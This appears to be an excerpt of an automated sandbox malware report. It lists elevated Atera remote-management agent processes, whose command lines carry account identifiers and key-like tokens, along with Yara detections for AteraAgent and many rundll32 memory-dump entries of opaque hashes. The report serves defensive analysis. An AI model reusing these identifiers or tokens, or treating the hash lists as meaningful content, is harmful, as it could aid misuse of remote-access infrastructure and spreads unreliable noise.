                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                          Start time:05:16:44
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x2c452be0000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                          Start time:05:16:44
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                          Start time:05:17:00
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                                                                                                                                                                                                                                                                          Imagebase:0x20ec3620000
                                                                                                                                                                                                                                                                          File size:177'704 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390230194.0000020EC3770000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2390295578.0000020EC37B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000019.00000002.2391164954.0000020EC4097000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                          Start time:05:17:00
                                                                                                                                                                                                                                                                          Start date:24/11/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff63e3b0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Reset < >
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $q$$q
                                                                                                                                                                                                                                                                            • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                            • Opcode ID: b1d823981d78add71fa21d2c6ffc3c952221e86b8073c62664390f35cbef9d20
                                                                                                                                                                                                                                                                            • Instruction ID: 796c968b9bd4f9d6cedbf21783c85846799bdc51bf1d5f8eeee110748f0045fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1d823981d78add71fa21d2c6ffc3c952221e86b8073c62664390f35cbef9d20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651AC35F012089FDB55DB79D850AAEBBE6FF89250B15822AE815DB750DB309D02CBA0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: f5f8348c5cbdf8529ed585367e420b7743f973b1304a04d17f71845280f61f39
                                                                                                                                                                                                                                                                            • Instruction ID: ecfd5cbf0459d51e447e85f8e5f5cfd03147b055c9e7523a4d3305d9297eea35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f8348c5cbdf8529ed585367e420b7743f973b1304a04d17f71845280f61f39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4719435F002149FEF549BB5D854B6EBAE7EFC8210F168029E9069B794DE34DC02CB91
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 855fefbdf25870b8337158d39e8d400d8f5129b968bd362a53334bffb949c376
                                                                                                                                                                                                                                                                            • Instruction ID: 7a005c65eb0c6316bbedbdd0e10ba4e4e5811ab0220b12412fcb5401d4d771a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855fefbdf25870b8337158d39e8d400d8f5129b968bd362a53334bffb949c376
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D51E930A08254AFEB599B64D8547AE7FB2DFC9320F16406ED806EB781CE798C05C7A1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: d7fadb5b8f7d072e5161e7684f8ea94014dc1465350b075b99508c8884ac990f
                                                                                                                                                                                                                                                                            • Instruction ID: 8b90318f3904685bc8fbcd047e4781a5eb3d512dc00791e7dd25ad5d8a937af9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7fadb5b8f7d072e5161e7684f8ea94014dc1465350b075b99508c8884ac990f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12412A31B002145BEF98AB699860B6E67A7DFC4310F01403DDD06EB780CE359D0AC7E5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 7898aa4dba6a70cd786917d09500bbad7883605b9fece425d15fb48468fa9496
                                                                                                                                                                                                                                                                            • Instruction ID: d80a54d7f6f69206937bc162a682dc1c46dca0b1b858ec311294385400e6835b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7898aa4dba6a70cd786917d09500bbad7883605b9fece425d15fb48468fa9496
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C314621F183540FEF696775682476E3BABCFC5710F0684BADC02CB782DD689D0A43A5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
Memory Dump Source
• Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5ca78a6de99d5b0ac4f2ca1af052055628b36cce8be8604174310918947fcbf4
                                                                                                                                                                                                                                                                            • Instruction ID: fbddb86584606e41f88b576bd51eb8d0238eac0455477a310af5fcf476cbb6a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ca78a6de99d5b0ac4f2ca1af052055628b36cce8be8604174310918947fcbf4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB512331B052148FCB50CB68D890AAABBF4FF49314B1681A6D818DF6A2DB31DE06C791
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1515ec8fa1b99cecfef0a893930c005ad5af93fab47ad983a9e24d20976315a2
                                                                                                                                                                                                                                                                            • Instruction ID: 3d651fbf2443bb4baf58d657508ff5412cc79ff4551f01f912e35918fde4df6b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1515ec8fa1b99cecfef0a893930c005ad5af93fab47ad983a9e24d20976315a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE313633B4D3456FCF596AA97C6172A7FA9CB81260B0B406BD908CF696DA258C05C3E1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4510b1527e5d0069ef0aca223a884accdad49d4f5703d8e0b72082df3e5bb2b0
                                                                                                                                                                                                                                                                            • Instruction ID: 06876d22dc8069a7197ad2d25173fc9bd171730b658d64549b23e8b6f998c531
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4510b1527e5d0069ef0aca223a884accdad49d4f5703d8e0b72082df3e5bb2b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06413A35B002089FCF94DF68D88099EBBB6FF88710B158169E915EB324DB31DD41CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c534d68e5d735f494e0f3cf18e2183d22482583a542fcfa75e154cc510f4db3f
                                                                                                                                                                                                                                                                            • Instruction ID: a051c8e8e2e29584aaf3c17eef7737f57c7d602c69ab9e4ed495883937b40d2b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c534d68e5d735f494e0f3cf18e2183d22482583a542fcfa75e154cc510f4db3f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94214D21B1D3440FDFAA6B31985076E3FA68FC6710F06407ADC41CBA86D9689E0D83F5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5c5e6c1ace2a16d23a55ec0aa808c439e2daa417e14424cc8109f71deb51bd99
                                                                                                                                                                                                                                                                            • Instruction ID: 904c2de2588451c06e5b4a51fa0510b4ebaf2a224c7ab025183f319acb8e565a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c5e6c1ace2a16d23a55ec0aa808c439e2daa417e14424cc8109f71deb51bd99
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6213832A853255FDB8527A47C143EA3F54CF42361F034477DD588F692D929CE4A83E5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3dae541e50652aeae1e9039c53ede56162d593b99d03a625c1092284393f31fc
                                                                                                                                                                                                                                                                            • Instruction ID: 42a842d99cfe0241cbf8409692b109f74d6015f2e651235ce5e8b6a6f65e8852
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dae541e50652aeae1e9039c53ede56162d593b99d03a625c1092284393f31fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3210332F003149BEF549B799850BAEBBE6DF84250F0640BAD906CB680EA31CD0AC791
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 462f7491ef2c5f4b67e5b6f307189ffac7acd99cec762bf64d76857a7aa1342b
                                                                                                                                                                                                                                                                            • Instruction ID: e8d47a23091253ca3ac7c92dd7bece87521b1fd8931c4249ac7b25bf3ca5d435
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 462f7491ef2c5f4b67e5b6f307189ffac7acd99cec762bf64d76857a7aa1342b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2211A75E501189FCB84DF69D8809DEBBB6FF8C710F108129E815EB320DB319942CBA0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c5eff354e94820afd421d8a3e7303a5075d2d069b68bfe9ae33e8a635de933f1
                                                                                                                                                                                                                                                                            • Instruction ID: 05c507189af148b023a07cbed63013764f2e9894580583e8630bbb655ce74d42
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5eff354e94820afd421d8a3e7303a5075d2d069b68bfe9ae33e8a635de933f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18114531A04115AFDB84EF54EC50B997BB2EFCC321F16402AD819A7781CF799D4AC7A0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.1390318981.000000000476D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0476D000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_476d000_rundll32.jbxd
Memory Dump Source
• Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: \;q
                                                                                                                                                                                                                                                                            • API String ID: 0-705206692
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                                                            • API String ID: 0-2092175375
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                                                            • API String ID: 0-2092175375
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$(q$(q$(q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-3372125087
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$\;q$eld$|q
                                                                                                                                                                                                                                                                            • API String ID: 0-975143470
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$(q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-1065528286
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$d
                                                                                                                                                                                                                                                                            • API String ID: 0-1617062230
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: fdf671a39e98941e625fd273b0e81e7bf07a6bd067899370bedcee09fd4c1c20
                                                                                                                                                                                                                                                                            • Instruction ID: feff9ed3158d6c729cc1c11c6b7f19a035392c9fec5e11c0f3febe0bd9f9f0cd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdf671a39e98941e625fd273b0e81e7bf07a6bd067899370bedcee09fd4c1c20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD10F35B002168FEB64DB69D49566EBBF2FF89301B24845DE4469B3A5DB30FC42CB81
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 241fbf7374ef5354e2f86e156d577ddd661e2f7f256b6baf46b497954b963fea
                                                                                                                                                                                                                                                                            • Instruction ID: 3a250ec1fb8d4d0c8b21f2591f7942ab5c38476d4b24d49d40841aeba6d293f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 241fbf7374ef5354e2f86e156d577ddd661e2f7f256b6baf46b497954b963fea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E15A74A003598FDB55CFA8C884A9DBBF6FF89300F148199D809AB3A5DB74ED46CB50
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (Aq$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-2048478478
                                                                                                                                                                                                                                                                            • Opcode ID: 1125eb43eb0bd08975f8b2da4821f62340933eec279b8fe87380da05fff4a8a6
                                                                                                                                                                                                                                                                            • Instruction ID: 5581f4f58aab925c9ee438dc2dff6dacddf7a5bc02d61dacf725a458a7446842
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1125eb43eb0bd08975f8b2da4821f62340933eec279b8fe87380da05fff4a8a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0C13B70B102199FDB58DFA9D554AAEBBB6EF88304F144029E406EB394DF74EC06CB91
                                                                                                                                                                                                                                                                            Strings
